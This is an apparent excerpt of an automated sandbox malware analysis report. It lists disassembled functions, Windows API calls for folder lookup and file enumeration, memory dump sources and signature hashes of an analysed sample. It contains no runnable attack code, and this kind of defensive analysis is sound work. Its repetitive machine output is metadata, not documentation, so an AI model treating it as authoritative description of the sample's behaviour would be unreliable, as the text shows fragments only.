                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                • Opcode ID: 192c4b5998c1387a9bdecfe1868fca892579f8ec032079e32480e50cf771cfdc
                                • Instruction ID: 37fee56337817650e231a3a9c1c5731c242daf96617c41b4ad4630e053de2799
                                • Opcode Fuzzy Hash: 192c4b5998c1387a9bdecfe1868fca892579f8ec032079e32480e50cf771cfdc
                                • Instruction Fuzzy Hash: B7F03C35F40308FBDB24DBB0DC59B9EB7B9AB48710F10C254B695A72C4D67696018B50
                                Function 00DDC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 00DDC74E
                                  • Part of subcall function 00DDBF9F: __amsg_exit.LIBCMT ref: 00DDBFAF
                                • __getptd.LIBCMT ref: 00DDC765
                                • __amsg_exit.LIBCMT ref: 00DDC773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00DDC797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: f79c0e91622e1608852630ccc2b0bab39cc5b52209427afe28343600313249f2
                                • Instruction ID: 42a35fca20b1c98e020b6fd641c4501597d792bd86578a331ade9f965d40566a
                                • Opcode Fuzzy Hash: f79c0e91622e1608852630ccc2b0bab39cc5b52209427afe28343600313249f2
                                • Instruction Fuzzy Hash: 85F09032D14302EBDB31BBB8984675E33A0EF00739F25514BF404AA3D2DB646941DE76
                                Function 00DD4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DD8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4F7A
                                • lstrcat.KERNEL32(?,00DE1070), ref: 00DD4F97
                                • lstrcat.KERNEL32(?,01629278), ref: 00DD4FAB
                                • lstrcat.KERNEL32(?,00DE1074), ref: 00DD4FBD
                                  • Part of subcall function 00DD4910: wsprintfA.USER32 ref: 00DD492C
                                  • Part of subcall function 00DD4910: FindFirstFileA.KERNEL32(?,?), ref: 00DD4943
                                  • Part of subcall function 00DD4910: StrCmpCA.SHLWAPI(?,00DE0FDC), ref: 00DD4971
                                  • Part of subcall function 00DD4910: StrCmpCA.SHLWAPI(?,00DE0FE0), ref: 00DD4987
                                  • Part of subcall function 00DD4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DD4B7D
                                  • Part of subcall function 00DD4910: FindClose.KERNEL32(000000FF), ref: 00DD4B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 38881f8d2aba227cc6b056c2d6e6b9b41919e69219295f2377909997f8234804
                                • Instruction ID: c8fff3d2a17a2df1b030b609363f5c468d835147ef83866080971a15edb208e4
                                • Opcode Fuzzy Hash: 38881f8d2aba227cc6b056c2d6e6b9b41919e69219295f2377909997f8234804
                                • Instruction Fuzzy Hash: 7921887AA00308ABC765F760DC56EED333CEB54300F004559B69953185EE7597C98BB1